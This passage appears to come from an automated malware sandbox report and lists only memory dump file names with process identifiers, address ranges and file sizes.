                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4608-308-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4632-77-0x0000000000DA0000-0x0000000000DEC000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    304KB

                                                                                                                                                                  • memory/4684-313-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/4984-244-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/5092-258-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB

                                                                                                                                                                  • memory/5092-256-0x00007FF60D5A0000-0x00007FF60D5FB000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    364KB